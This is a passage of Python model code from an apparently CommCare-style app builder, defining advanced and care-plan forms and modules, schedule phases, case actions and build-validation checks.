        """
        r = set(["none"])
        for form in self.get_forms():
            r.add(form.requires)
        if self.case_list.show:
            r.add('case')
        if self.referral_list.show:
            r.add('referral')
        for val in ("referral", "case", "none"):
            if val in r:
                return val

    def requires_case_details(self):
        """True if the case list is shown or any form requires a case."""
        ret = False
        if self.case_list.show:
            return True
        for form in self.get_forms():
            if form.requires_case():
                ret = True
                break
        return ret

    @memoized
    def all_forms_require_a_case(self):
        # Vacuously True for a module with no forms.
        return all([form.requires == 'case' for form in self.get_forms()])

    def uses_usercase(self):
        """Return True if this module has any forms that use the usercase.
        """
        return any(form.uses_usercase() for form in self.get_forms())
class AdvancedForm(IndexedFormBase, NavMenuItemMediaMixin):
    """A form with explicit load/update/open case actions (advanced modules)."""
    form_type = 'advanced_form'
    form_filter = StringProperty()
    actions = SchemaProperty(AdvancedFormActions)
    schedule = SchemaProperty(FormSchedule, default=None)

    @classmethod
    def wrap(cls, data):
        # lazy migration to swap keys with values in action preload dict.
        # http://manage.dimagi.com/default.asp?162213
        load_actions = data.get('actions', {}).get('load_update_cases', [])
        for action in load_actions:
            preload = action['preload']
            # Python 2: dict.values() returns a list, so [0] is an arbitrary
            # entry; a leading '/' marks the old question-path-keyed format.
            if preload and preload.values()[0].startswith('/'):
                action['preload'] = {v: k for k, v in preload.items()}
        return super(AdvancedForm, cls).wrap(data)

    def pre_delete_hook(self):
        # Best-effort: detach this form from its schedule phase before delete.
        try:
            self.disable_schedule()
        except (ScheduleError, TypeError, AttributeError) as e:
            logging.error("There was a {error} while running the pre_delete_hook on {form_id}. "
                          "There is probably nothing to worry about, but you could check to make sure "
                          "that there are no issues with this form.".format(error=e, form_id=self.unique_id))
            pass

    def pre_move_hook(self, from_module, to_module):
        # Schedules are per-module, so moving across modules disables them.
        if from_module != to_module:
            try:
                self.disable_schedule()
            except (ScheduleError, TypeError, AttributeError) as e:
                logging.error("There was a {error} while running the pre_move_hook on {form_id}. "
                              "There is probably nothing to worry about, but you could check to make sure "
                              "that there are no issues with this module.".format(error=e, form_id=self.unique_id))
                pass

    def add_stuff_to_xform(self, xform, build_profile_id=None):
        super(AdvancedForm, self).add_stuff_to_xform(xform, build_profile_id)
        xform.add_case_and_meta_advanced(self)

    def requires_case(self):
        """Form requires a case that must be selected by the user (excludes autoloaded cases)
        """
        return any(not action.auto_select for action in self.actions.load_update_cases)

    @property
    def requires(self):
        return 'case' if self.requires_case() else 'none'

    def is_registration_form(self, case_type=None):
        """
        Defined as form that opens a single case. If the case is a sub-case then
        the form is only allowed to load parent cases (and any auto-selected cases).
        """
        reg_actions = self.get_registration_actions(case_type)
        if len(reg_actions) != 1:
            return False

        load_actions = [action for action in self.actions.load_update_cases if not action.auto_select]
        if not load_actions:
            return True

        reg_action = reg_actions[0]
        if not reg_action.case_indices:
            return False

        # Work on a copy so popping tags doesn't mutate the real actions meta.
        actions_by_tag = deepcopy(self.actions.actions_meta_by_tag)
        actions_by_tag.pop(reg_action.case_tag)

        def check_parents(tag):
            """Recursively check parent actions to ensure that all actions for this form are
            either parents of the registration action or else auto-select actions.
            """
            if not tag:
                # at top level so all actions should have been visited
                return not actions_by_tag or all(
                    getattr(a['action'], 'auto_select', False) for a in actions_by_tag.values()
                )

            try:
                parent = actions_by_tag.pop(tag)
            except KeyError:
                return False

            return all(check_parents(p.tag) for p in parent['action'].case_indices)

        return all(check_parents(parent.tag) for parent in reg_action.case_indices)

    def get_registration_actions(self, case_type=None):
        """
        :return: List of actions that create a case. Subcase actions are included
                 as long as they are not inside a repeat. If case_type is not None
                 only return actions that create a case of the specified type.
        """
        registration_actions = [
            action for action in self.actions.get_open_actions()
            if not action.is_subcase or not action.repeat_context
        ]
        if case_type:
            registration_actions = [a for a in registration_actions if a.case_type == case_type]

        return registration_actions

    def uses_case_type(self, case_type, invert_match=False):
        """True if any load/update action matches (or, inverted, mismatches) the type."""
        def match(ct):
            matches = ct == case_type
            return not matches if invert_match else matches

        return any(action for action in self.actions.load_update_cases if match(action.case_type))

    def uses_usercase(self):
        return self.uses_case_type(USERCASE_TYPE)

    def all_other_forms_require_a_case(self):
        m = self.get_module()
        return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])

    def get_module(self):
        return self._parent

    def get_phase(self):
        # Return the schedule phase containing this form, or None.
        module = self.get_module()

        return next((phase for phase in module.get_schedule_phases()
                     for form in phase.get_forms()
                     if form.unique_id == self.unique_id),
                    None)

    def disable_schedule(self):
        self.schedule.enabled = False
        phase = self.get_phase()
        if phase:
            phase.remove_form(self)

    def check_actions(self):
        """Validate this form's case actions; return a list of error dicts."""
        errors = []

        # Subcase actions must reference existing parent tags and respect
        # repeat-context nesting relative to their parent open actions.
        for action in self.actions.get_subcase_actions():
            case_tags = self.actions.get_case_tags()
            for case_index in action.case_indices:
                if case_index.tag not in case_tags:
                    errors.append({'type': 'missing parent tag', 'case_tag': case_index.tag})

            if isinstance(action, AdvancedOpenCaseAction):
                if not action.name_path:
                    errors.append({'type': 'case_name required', 'case_tag': action.case_tag})

                for case_index in action.case_indices:
                    meta = self.actions.actions_meta_by_tag.get(case_index.tag)
                    if meta and meta['type'] == 'open' and meta['action'].repeat_context:
                        if (
                            not action.repeat_context or
                            not action.repeat_context.startswith(meta['action'].repeat_context)
                        ):
                            errors.append({'type': 'subcase repeat context',
                                           'case_tag': action.case_tag,
                                           'parent_tag': case_index.tag})

            errors.extend(self.check_case_properties(
                subcase_names=action.get_property_names(),
                case_tag=action.case_tag
            ))

        for action in self.actions.get_all_actions():
            if not action.case_type and (not isinstance(action, LoadUpdateAction) or not action.auto_select):
                errors.append({'type': "no case type in action", 'case_tag': action.case_tag})

            # Auto-select actions need both a key and a source appropriate to
            # their selection mode, and case-mode refs must point at real tags.
            if isinstance(action, LoadUpdateAction) and action.auto_select:
                mode = action.auto_select.mode
                if not action.auto_select.value_key:
                    key_names = {
                        AUTO_SELECT_CASE: _('Case property'),
                        AUTO_SELECT_FIXTURE: _('Lookup Table field'),
                        AUTO_SELECT_USER: _('custom user property'),
                        AUTO_SELECT_RAW: _('custom XPath expression'),
                    }
                    if mode in key_names:
                        errors.append({'type': 'auto select key', 'key_name': key_names[mode]})

                if not action.auto_select.value_source:
                    source_names = {
                        AUTO_SELECT_CASE: _('Case tag'),
                        AUTO_SELECT_FIXTURE: _('Lookup Table tag'),
                    }
                    if mode in source_names:
                        errors.append({'type': 'auto select source', 'source_name': source_names[mode]})
                elif mode == AUTO_SELECT_CASE:
                    case_tag = action.auto_select.value_source
                    if not self.actions.get_action_from_tag(case_tag):
                        errors.append({'type': 'auto select case ref', 'case_tag': action.case_tag})

            errors.extend(self.check_case_properties(
                all_names=action.get_property_names(),
                case_tag=action.case_tag
            ))

        if self.form_filter:
            # A form filter that references a case only makes sense when at
            # least one case is selected by the user (not auto-selected).
            form_filter_references_case = (
                xpath_references_case(self.form_filter) or
                xpath_references_user_case(self.form_filter)
            )

            if form_filter_references_case:
                if not any(action for action in self.actions.load_update_cases if not action.auto_select):
                    errors.append({'type': "filtering without case"})

        def generate_paths():
            for action in self.actions.get_all_actions():
                for path in action.get_paths():
                    yield path

        errors.extend(self.check_paths(generate_paths()))

        return errors

    def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
        errors = []
        if xml_valid:
            # Annotate each action error with the shared build-error metadata.
            for error in self.check_actions():
                error.update(error_meta)
                errors.append(error)

        module = self.get_module()
        if validate_module:
            errors.extend(module.get_case_errors(
                needs_case_type=False,
                needs_case_detail=module.requires_case_details(),
                needs_referral_detail=False,
            ))

        return errors

    def get_case_updates(self, case_type):
        """Return the set of case properties this form saves for ``case_type``."""
        updates = set()
        format_key = self.get_case_property_name_formatter()
        for action in self.actions.get_all_actions():
            if action.case_type == case_type:
                updates.update(format_key(*item)
                               for item in action.case_properties.iteritems())
        if self.schedule and self.schedule.enabled and self.source:
            # Scheduled forms also write scheduler-managed case properties;
            # derive them from the generated xform.
            xform = self.wrapped_xform()
            self.add_stuff_to_xform(xform)
            scheduler_updates = xform.get_scheduler_case_updates()[case_type]
        else:
            scheduler_updates = set()

        return updates.union(scheduler_updates)

    @memoized
    def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
        """Return (parent (type, relationship) pairs, contributed property names)
        for subcases of ``case_type`` opened by this form."""
        parent_types = set()
        case_properties = set()
        for subcase in self.actions.get_subcase_actions():
            if subcase.case_type == case_type:
                case_properties.update(
                    subcase.case_properties.keys()
                )
                for case_index in subcase.case_indices:
                    parent = self.actions.get_action_from_tag(case_index.tag)
                    if parent:
                        parent_types.add((parent.case_type, case_index.reference_id or 'parent'))

        return parent_types, case_properties

    def update_app_case_meta(self, app_case_meta):
        """Record this form's case property saves/loads and open/close effects."""
        from corehq.apps.reports.formdetails.readable import FormQuestionResponse
        questions = {
            q['value']: FormQuestionResponse(q)
            for q in self.get_questions(self.get_app().langs, include_translations=True)
        }
        for action in self.actions.load_update_cases:
            for name, question_path in action.case_properties.items():
                self.add_property_save(
                    app_case_meta,
                    action.case_type,
                    name,
                    questions,
                    question_path
                )
            for question_path, name in action.preload.items():
                self.add_property_load(
                    app_case_meta,
                    action.case_type,
                    name,
                    questions,
                    question_path
                )
            if action.close_condition.is_active():
                meta = app_case_meta.get_type(action.case_type)
                meta.add_closer(self.unique_id, action.close_condition)
        for action in self.actions.open_cases:
            self.add_property_save(
                app_case_meta,
                action.case_type,
                'name',
                questions,
                action.name_path,
                action.open_condition
            )
            for name, question_path in action.case_properties.items():
                self.add_property_save(
                    app_case_meta,
                    action.case_type,
                    name,
                    questions,
                    question_path,
                    action.open_condition
                )
            meta = app_case_meta.get_type(action.case_type)
            meta.add_opener(self.unique_id, action.open_condition)
            if action.close_condition.is_active():
                meta.add_closer(self.unique_id, action.close_condition)
class SchedulePhaseForm(IndexedSchema):
    """
    A reference to a form in a schedule phase.
    """
    # Stores the referenced form's unique_id, scoped by the JSON path below.
    form_id = FormIdProperty("modules[*].schedule_phases[*].forms[*].form_id")
class SchedulePhase(IndexedSchema):
    """
    SchedulePhases are attached to a module.

    A Schedule Phase is a grouping of forms that occur within a period and share an anchor
    A module should not have more than one SchedulePhase with the same anchor

    anchor:                     Case property containing a date after which this phase becomes active
    forms: 			The forms that are to be filled out within this phase
    """
    anchor = StringProperty()
    forms = SchemaListProperty(SchedulePhaseForm)

    @property
    def id(self):
        """ A Schedule Phase is 1-indexed """
        _id = super(SchedulePhase, self).id
        return _id + 1

    @property
    def phase_id(self):
        return "{}_{}".format(self.anchor, self.id)

    def get_module(self):
        return self._parent

    _get_forms = IndexedSchema.Getter('forms')

    def get_forms(self):
        """Returns the actual form objects related to this phase"""
        module = self.get_module()
        return (module.get_form_by_unique_id(form.form_id) for form in self._get_forms())

    def get_form(self, desired_form):
        # Returns the phase's form matching desired_form's unique_id, or None.
        return next((form for form in self.get_forms() if form.unique_id == desired_form.unique_id), None)

    def get_phase_form_index(self, form):
        """
        Returns the index of the form with respect to the phase

        schedule_phase.forms = [a,b,c]
        schedule_phase.get_phase_form_index(b)
        => 1
        schedule_phase.get_phase_form_index(c)
        => 2
        """
        # Note: SchedulePhaseForm ids are 0-indexed (only SchedulePhase.id adds 1).
        return next((phase_form.id for phase_form in self._get_forms() if phase_form.form_id == form.unique_id),
                    None)

    def remove_form(self, form):
        """Remove a form from the phase"""
        idx = self.get_phase_form_index(form)
        if idx is None:
            raise ScheduleError("That form doesn't exist in the phase")

        self.forms.remove(self.forms[idx])

    def add_form(self, form):
        """Adds a form to this phase, removing it from other phases"""
        old_phase = form.get_phase()
        if old_phase is not None and old_phase.anchor != self.anchor:
            old_phase.remove_form(form)

        if self.get_form(form) is None:
            self.forms.append(SchedulePhaseForm(form_id=form.unique_id))

    def change_anchor(self, new_anchor):
        # Rename this phase's anchor; the module must not end up with two
        # phases sharing an anchor.
        if new_anchor is None or new_anchor.strip() == '':
            raise ScheduleError(_("You can't create a phase without an anchor property"))

        self.anchor = new_anchor

        if self.get_module().phase_anchors.count(new_anchor) > 1:
            raise ScheduleError(_("You can't have more than one phase with the anchor {}").format(new_anchor))
class AdvancedModule(ModuleBase):
    """A module of AdvancedForms, supporting schedules and product details."""
    module_type = 'advanced'
    case_label = DictProperty()
    forms = SchemaListProperty(AdvancedForm)
    case_details = SchemaProperty(DetailPair)
    product_details = SchemaProperty(DetailPair)
    put_in_root = BooleanProperty(default=False)
    case_list = SchemaProperty(CaseList)
    has_schedule = BooleanProperty()
    schedule_phases = SchemaListProperty(SchedulePhase)
    get_schedule_phases = IndexedSchema.Getter('schedule_phases')
    search_config = SchemaProperty(CaseSearch)

    @classmethod
    def new_module(cls, name, lang):
        """Create an advanced module with default case and product details."""
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
            )]
        )

        module = AdvancedModule(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            forms=[],
            case_type='',
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
            product_details=DetailPair(
                short=Detail(
                    columns=[
                        DetailColumn(
                            format='plain',
                            header={(lang or 'en'): ugettext("Product")},
                            field='name',
                            model='product',
                        ),
                    ],
                ),
                long=Detail(),
            ),
        )
        module.get_or_create_unique_id()
        return module

    def new_form(self, name, lang, attachment=''):
        """Append a new AdvancedForm (schedule disabled) and return it."""
        form = AdvancedForm(
            name={lang if lang else "en": name if name else _("Untitled Form")},
        )
        form.schedule = FormSchedule(enabled=False)

        self.forms.append(form)
        form = self.get_form(-1)
        form.source = attachment
        return form

    def add_insert_form(self, from_module, form, index=None, with_source=False):
        """Insert ``form`` at ``index`` (append when falsy), converting a basic
        ``Form`` into an ``AdvancedForm`` with equivalent case actions.

        NOTE(review): `if index:` makes index=0 append instead of inserting at
        the front, and `index or -1` then returns the last form — probably
        should test `index is not None`; confirm before changing callers.
        """
        if isinstance(form, AdvancedForm):
            new_form = form
        elif isinstance(form, Form):
            new_form = AdvancedForm(
                name=form.name,
                form_filter=form.form_filter,
                media_image=form.media_image,
                media_audio=form.media_audio
            )
            new_form._parent = self
            form._parent = self
            if with_source:
                new_form.source = form.source

            # Translate the basic form's open/update/close/preload/subcase
            # actions into equivalent advanced open/load-update actions.
            actions = form.active_actions()
            open = actions.get('open_case', None)
            update = actions.get('update_case', None)
            close = actions.get('close_case', None)
            preload = actions.get('case_preload', None)
            subcases = actions.get('subcases', None)
            case_type = from_module.case_type

            base_action = None
            if open:
                base_action = AdvancedOpenCaseAction(
                    case_type=case_type,
                    case_tag='open_{0}_0'.format(case_type),
                    name_path=open.name_path,
                    open_condition=open.condition,
                    case_properties=update.update if update else {},
                )
                new_form.actions.open_cases.append(base_action)
            elif update or preload or close:
                base_action = LoadUpdateAction(
                    case_type=case_type,
                    case_tag='load_{0}_0'.format(case_type),
                    case_properties=update.update if update else {},
                    preload=preload.preload if preload else {}
                )

                if from_module.parent_select.active:
                    # Recreate the parent-selection chain as a sequence of
                    # load actions tagged parent, parent_parent, ...
                    app = self.get_app()
                    select_chain = get_select_chain(app, from_module, include_self=False)
                    for n, link in enumerate(reversed(list(enumerate(select_chain)))):
                        i, module = link
                        new_form.actions.load_update_cases.append(LoadUpdateAction(
                            case_type=module.case_type,
                            case_tag='_'.join(['parent'] * (i + 1)),
                            details_module=module.unique_id,
                            case_index=CaseIndex(tag='_'.join(['parent'] * (i + 2)) if n > 0 else '')
                        ))

                    base_action.case_indices = [CaseIndex(tag='parent')]

                if close:
                    base_action.close_condition = close.condition
                new_form.actions.load_update_cases.append(base_action)

            if subcases:
                for i, subcase in enumerate(subcases):
                    open_subcase_action = AdvancedOpenCaseAction(
                        case_type=subcase.case_type,
                        case_tag='open_{0}_{1}'.format(subcase.case_type, i+1),
                        name_path=subcase.case_name,
                        open_condition=subcase.condition,
                        case_properties=subcase.case_properties,
                        repeat_context=subcase.repeat_context,
                        case_indices=[CaseIndex(
                            tag=base_action.case_tag if base_action else '',
                            reference_id=subcase.reference_id,
                        )]
                    )
                    new_form.actions.open_cases.append(open_subcase_action)
        else:
            raise IncompatibleFormTypeException()

        if index:
            self.forms.insert(index, new_form)
        else:
            self.forms.append(new_form)
        return self.get_form(index or -1)

    def rename_lang(self, old_lang, new_lang):
        super(AdvancedModule, self).rename_lang(old_lang, new_lang)
        self.case_list.rename_lang(old_lang, new_lang)

    def requires_case_details(self):
        # True if the case list is shown or any form loads this module's
        # case type. (Implicitly returns None — falsy — otherwise.)
        if self.case_list.show:
            return True

        for form in self.forms:
            if any(action.case_type == self.case_type for action in form.actions.load_update_cases):
                return True

    def all_forms_require_a_case(self):
        return all(form.requires_case() for form in self.forms)

    def get_details(self):
        # Product details are only active when commtrack is enabled.
        return (
            ('case_short', self.case_details.short, True),
            ('case_long', self.case_details.long, True),
            ('product_short', self.product_details.short, self.get_app().commtrack_enabled),
            ('product_long', self.product_details.long, False),
        )

    def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
        """Yield error dicts for missing case/product configuration."""
        module_info = self.get_module_info()

        if needs_case_type and not self.case_type:
            yield {
                'type': 'no case type',
                'module': module_info,
            }

        if needs_case_detail:
            if not self.case_details.short.columns:
                yield {
                    'type': 'no case detail',
                    'module': module_info,
                }
            if self.get_app().commtrack_enabled and not self.product_details.short.columns:
                for form in self.forms:
                    if self.case_list.show or \
                            any(action.show_product_stock for action in form.actions.load_update_cases):
                        yield {
                            'type': 'no product detail',
                            'module': module_info,
                        }
                        break
            columns = self.case_details.short.columns + self.case_details.long.columns
            if self.get_app().commtrack_enabled:
                columns += self.product_details.short.columns
            errors = self.validate_detail_columns(columns)
            for error in errors:
                yield error

    def validate_for_build(self):
        """Base validation plus case-list-form consistency checks.

        When a case list form is configured, every form in the module must
        load the same case types, require a case, end on the module's case
        type with a shared tag, and use this module's details.
        """
        errors = super(AdvancedModule, self).validate_for_build()
        if not self.forms and not self.case_list.show:
            errors.append({
                'type': 'no forms or case list',
                'module': self.get_module_info(),
            })
        if self.case_list_form.form_id:
            forms = self.forms

            case_tag = None
            loaded_case_types = None
            for form in forms:
                info = self.get_module_info()
                form_info = {"id": form.id if hasattr(form, 'id') else None, "name": form.name}
                non_auto_select_actions = [a for a in form.actions.load_update_cases if not a.auto_select]
                this_forms_loaded_case_types = {action.case_type for action in non_auto_select_actions}
                if loaded_case_types is None:
                    loaded_case_types = this_forms_loaded_case_types
                elif loaded_case_types != this_forms_loaded_case_types:
                    errors.append({
                        'type': 'all forms in case list module must load the same cases',
                        'module': info,
                        'form': form_info,
                    })

                if not non_auto_select_actions:
                    errors.append({
                        'type': 'case list module form must require case',
                        'module': info,
                        'form': form_info,
                    })
                elif len(non_auto_select_actions) != 1:
                    # With multiple loads, each must be indexed off the
                    # previous one (a pure parent chain).
                    for index, action in reversed(list(enumerate(non_auto_select_actions))):
                        if (
                            index > 0 and
                            non_auto_select_actions[index - 1].case_tag not in (p.tag for p in action.case_indices)
                        ):
                            errors.append({
                                'type': 'case list module form can only load parent cases',
                                'module': info,
                                'form': form_info,
                            })

                case_action = non_auto_select_actions[-1] if non_auto_select_actions else None
                if case_action and case_action.case_type != self.case_type:
                    errors.append({
                        'type': 'case list module form must match module case type',
                        'module': info,
                        'form': form_info,
                    })

                # set case_tag if not already set
                case_tag = case_action.case_tag if not case_tag and case_action else case_tag
                if case_action and case_action.case_tag != case_tag:
                    errors.append({
                        'type': 'all forms in case list module must have same case management',
                        'module': info,
                        'form': form_info,
                        'expected_tag': case_tag
                    })

                if case_action and case_action.details_module and case_action.details_module != self.unique_id:
                    errors.append({
                        'type': 'forms in case list module must use modules details',
                        'module': info,
                        'form': form_info,
                    })

        return errors

    def _uses_case_type(self, case_type, invert_match=False):
        return any(form.uses_case_type(case_type, invert_match) for form in self.forms)

    def uses_usercase(self):
        """Return True if this module has any forms that use the usercase.
        """
        return self._uses_case_type(USERCASE_TYPE)

    @property
    def phase_anchors(self):
        return [phase.anchor for phase in self.schedule_phases]

    def get_or_create_schedule_phase(self, anchor):
        """Returns a tuple of (phase, new?)"""
        if anchor is None or anchor.strip() == '':
            raise ScheduleError(_("You can't create a phase without an anchor property"))

        phase = next((phase for phase in self.get_schedule_phases() if phase.anchor == anchor), None)
        is_new_phase = False

        if phase is None:
            self.schedule_phases.append(SchedulePhase(anchor=anchor))
            # TODO: is there a better way of doing this?
            phase = list(self.get_schedule_phases())[-1]  # get the phase from the module so we know the _parent
            is_new_phase = True

        return (phase, is_new_phase)

    def _clear_schedule_phases(self):
        self.schedule_phases = []

    def update_schedule_phases(self, anchors):
        """ Take a list of anchors, reorders, deletes and creates phases from it """
        old_phases = {phase.anchor: phase for phase in self.get_schedule_phases()}
        self._clear_schedule_phases()

        for anchor in anchors:
            try:
                self.schedule_phases.append(old_phases.pop(anchor))
            except KeyError:
                self.get_or_create_schedule_phase(anchor)

        # Phases left in old_phases were deleted; refuse if any still hold forms.
        deleted_phases_with_forms = [anchor for anchor, phase in old_phases.iteritems() if len(phase.forms)]
        if deleted_phases_with_forms:
            raise ScheduleError(_("You can't delete phases with anchors "
                                  "{phase_anchors} because they have forms attached to them").format(
                                      phase_anchors=(", ").join(deleted_phases_with_forms)))

        return self.get_schedule_phases()

    def update_schedule_phase_anchors(self, new_anchors):
        """ takes a list of tuples (id, new_anchor) and updates the phase anchors """
        for anchor in new_anchors:
            id = anchor[0] - 1  # phase ids are 1-indexed; convert to list index
            new_anchor = anchor[1]
            try:
                list(self.get_schedule_phases())[id].change_anchor(new_anchor)
            except IndexError:
                pass  # That phase wasn't found, so we can't change it's anchor. Ignore it
class CareplanForm(IndexedFormBase, NavMenuItemMediaMixin):
    """Base class for care plan goal/task forms; dispatches wrap() by doc_type.

    Subclasses define ``case_type``, the ``*_path`` properties and
    ``case_updates()``; ``mode`` is 'create' or 'update'.
    """
    form_type = 'careplan_form'
    mode = StringProperty(required=True, choices=['create', 'update'])
    custom_case_updates = DictProperty()
    case_preload = DictProperty()

    @classmethod
    def wrap(cls, data):
        # Polymorphic wrap: route to the concrete subclass by doc_type.
        if cls is CareplanForm:
            doc_type = data['doc_type']
            if doc_type == 'CareplanGoalForm':
                return CareplanGoalForm.wrap(data)
            elif doc_type == 'CareplanTaskForm':
                return CareplanTaskForm.wrap(data)
            else:
                raise ValueError('Unexpected doc_type for CareplanForm', doc_type)
        else:
            return super(CareplanForm, cls).wrap(data)

    def add_stuff_to_xform(self, xform, build_profile_id=None):
        super(CareplanForm, self).add_stuff_to_xform(xform, build_profile_id)
        xform.add_care_plan(self)

    def get_case_updates(self, case_type):
        # Only this form's own case type receives updates.
        if case_type == self.case_type:
            format_key = self.get_case_property_name_formatter()
            return [format_key(*item) for item in self.case_updates().iteritems()]
        else:
            return []

    def get_case_type(self):
        return self.case_type

    def get_parent_case_type(self):
        return self._parent.case_type

    def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
        """Return ((parent type, relationship) pairs, contributed property names).

        Goals index the module's case as 'parent'; tasks index a goal as 'goal'.
        """
        parent_types = set()
        case_properties = set()
        if case_type == self.case_type:
            if case_type == CAREPLAN_GOAL:
                parent_types.add((module_case_type, 'parent'))
            elif case_type == CAREPLAN_TASK:
                parent_types.add((CAREPLAN_GOAL, 'goal'))
            case_properties.update(self.case_updates().keys())

        return parent_types, case_properties

    def is_registration_form(self, case_type=None):
        return self.mode == 'create' and (not case_type or self.case_type == case_type)

    def update_app_case_meta(self, app_case_meta):
        """Record property saves/loads and open/close conditions for this form."""
        from corehq.apps.reports.formdetails.readable import FormQuestionResponse
        questions = {
            q['value']: FormQuestionResponse(q)
            for q in self.get_questions(self.get_app().langs, include_translations=True)
        }
        meta = app_case_meta.get_type(self.case_type)
        for name, question_path in self.case_updates().items():
            self.add_property_save(
                app_case_meta,
                self.case_type,
                name,
                questions,
                question_path
            )
        for name, question_path in self.case_preload.items():
            self.add_property_load(
                app_case_meta,
                self.case_type,
                name,
                questions,
                question_path
            )
        meta.add_opener(self.unique_id, FormActionCondition(
            type='always',
        ))
        # close_path is declared on the concrete subclasses.
        meta.add_closer(self.unique_id, FormActionCondition(
            type='if',
            question=self.close_path,
            answer='yes',
        ))
class CareplanGoalForm(CareplanForm):
    """Care plan form that creates or updates a goal case."""
    case_type = CAREPLAN_GOAL
    name_path = StringProperty(required=True, default='/data/name')
    date_followup_path = StringProperty(required=True, default='/data/date_followup')
    description_path = StringProperty(required=True, default='/data/description')
    close_path = StringProperty(required=True, default='/data/close_goal')

    @classmethod
    def new_form(cls, lang, name, mode):
        """Build a goal form for ``mode`` and return (form, xml source)."""
        action = 'Update' if mode == 'update' else 'New'
        form = CareplanGoalForm(mode=mode)
        name = name or '%s Careplan %s' % (action, CAREPLAN_CASE_NAMES[form.case_type])
        form.name = {lang: name}
        if mode == 'update':
            # The update template nests the description question in a group.
            form.description_path = '/data/description_group/description'
        source = load_form_template('%s_%s.xml' % (form.case_type, mode))
        return form, source

    def case_updates(self):
        # Custom updates first, then the fixed goal properties override them.
        changes = self.custom_case_updates.copy()
        changes.update({
            'date_followup': self.date_followup_path,
            'description': self.description_path,
        })
        return changes

    def get_fixed_questions(self):
        """Return the built-in question descriptors, varying by mode."""
        def q(name, case_key, label):
            return {
                'name': name,
                'key': case_key,
                'label': label,
                'path': self[name]
            }
        questions = [
            q('description_path', 'description', _('Description')),
            q('date_followup_path', 'date_followup', _('Followup date')),
        ]
        if self.mode == 'create':
            return [q('name_path', 'name', _('Name'))] + questions
        else:
            return questions + [q('close_path', 'close', _('Close if'))]
class CareplanTaskForm(CareplanForm):
    """Care plan form that creates or updates a task case."""
    case_type = CAREPLAN_TASK
    name_path = StringProperty(required=True, default='/data/task_repeat/name')
    date_followup_path = StringProperty(required=True, default='/data/date_followup')
    description_path = StringProperty(required=True, default='/data/description')
    latest_report_path = StringProperty(required=True, default='/data/progress_group/progress_update')
    close_path = StringProperty(required=True, default='/data/task_complete')

    @classmethod
    def new_form(cls, lang, name, mode):
        """Build a task form for ``mode`` and return (form, xml source)."""
        action = 'Update' if mode == 'update' else 'New'
        form = CareplanTaskForm(mode=mode)
        name = name or '%s Careplan %s' % (action, CAREPLAN_CASE_NAMES[form.case_type])
        form.name = {lang: name}
        if mode == 'create':
            # The create template keeps these questions inside the task repeat.
            form.date_followup_path = '/data/task_repeat/date_followup'
            form.description_path = '/data/task_repeat/description'
        source = load_form_template('%s_%s.xml' % (form.case_type, mode))
        return form, source

    def case_updates(self):
        # Custom updates first; fixed properties differ by mode.
        changes = self.custom_case_updates.copy()
        changes.update({
            'date_followup': self.date_followup_path,
        })
        if self.mode == 'create':
            changes['description'] = self.description_path
        else:
            changes['latest_report'] = self.latest_report_path
        return changes

    def get_fixed_questions(self):
        """Return the built-in question descriptors, varying by mode."""
        def q(name, case_key, label):
            return {
                'name': name,
                'key': case_key,
                'label': label,
                'path': self[name]
            }
        questions = [
            q('date_followup_path', 'date_followup', _('Followup date')),
        ]
        if self.mode == 'create':
            return [
                q('name_path', 'name', _('Name')),
                q('description_path', 'description', _('Description')),
            ] + questions
        else:
            return questions + [
                q('latest_report_path', 'latest_report', _('Latest report')),
                q('close_path', 'close', _('Close if')),
            ]
class CareplanModule(ModuleBase):
    """
    A set of forms and configuration for managing the Care Plan workflow.
    """
    module_type = 'careplan'
    parent_select = SchemaProperty(ParentSelect)
    display_separately = BooleanProperty(default=False)
    forms = SchemaListProperty(CareplanForm)
    goal_details = SchemaProperty(DetailPair)
    task_details = SchemaProperty(DetailPair)
    @classmethod
    def new_module(cls, name, lang, target_module_id, target_case_type):
        """Create a careplan module that parent-selects against another module."""
        lang = lang or 'en'
        module = CareplanModule(
            name={lang: name or ugettext("Care Plan")},
            parent_select=ParentSelect(
                active=True,
                relationship='parent',
                module_id=target_module_id
            ),
            case_type=target_case_type,
            goal_details=DetailPair(
                short=cls._get_detail(lang, 'goal_short'),
                long=cls._get_detail(lang, 'goal_long'),
            ),
            task_details=DetailPair(
                short=cls._get_detail(lang, 'task_short'),
                long=cls._get_detail(lang, 'task_long'),
            )
        )
        module.get_or_create_unique_id()
        return module
    @classmethod
    def _get_detail(cls, lang, detail_type):
        """Build the default case Detail for one of the four detail types:
        'goal_short', 'goal_long', 'task_short', 'task_long'."""
        header = ugettext('Goal') if detail_type.startswith('goal') else ugettext('Task')
        columns = [
            DetailColumn(
                format='plain',
                header={lang: header},
                field='name',
                model='case'),
            DetailColumn(
                format='date',
                header={lang: ugettext("Followup")},
                field='date_followup',
                model='case')]
        if detail_type.endswith('long'):
            columns.append(DetailColumn(
                format='plain',
                header={lang: ugettext("Description")},
                field='description',
                model='case'))
        # Bug fix: this previously compared against 'tasks_long', a value that
        # is never produced (see the four detail types above and get_details()),
        # so the "Last update" column was unreachable dead code.
        if detail_type == 'task_long':
            columns.append(DetailColumn(
                format='plain',
                header={lang: ugettext("Last update")},
                field='latest_report',
                model='case'))
        return Detail(type=detail_type, columns=columns)
    def add_insert_form(self, from_module, form, index=None, with_source=False):
        """Append `form`, or insert it at `index`, and return the stored form.

        Raises IncompatibleFormTypeException for non-careplan forms.
        """
        if not isinstance(form, CareplanForm):
            raise IncompatibleFormTypeException()
        # Bug fix: use an explicit None check so that index=0 inserts at the
        # front instead of appending (`if index:` treated 0 as "no index").
        if index is not None:
            self.forms.insert(index, form)
            return self.get_form(index)
        self.forms.append(form)
        return self.get_form(-1)
    def requires_case_details(self):
        return True
    def get_case_types(self):
        return set([self.case_type]) | set(f.case_type for f in self.forms)
    def get_form_by_type(self, case_type, mode):
        # Returns None when no form matches.
        for form in self.get_forms():
            if form.case_type == case_type and form.mode == mode:
                return form
    def get_details(self):
        # (detail id, Detail, enabled) triples consumed by suite generation.
        return (
            ('%s_short' % CAREPLAN_GOAL, self.goal_details.short, True),
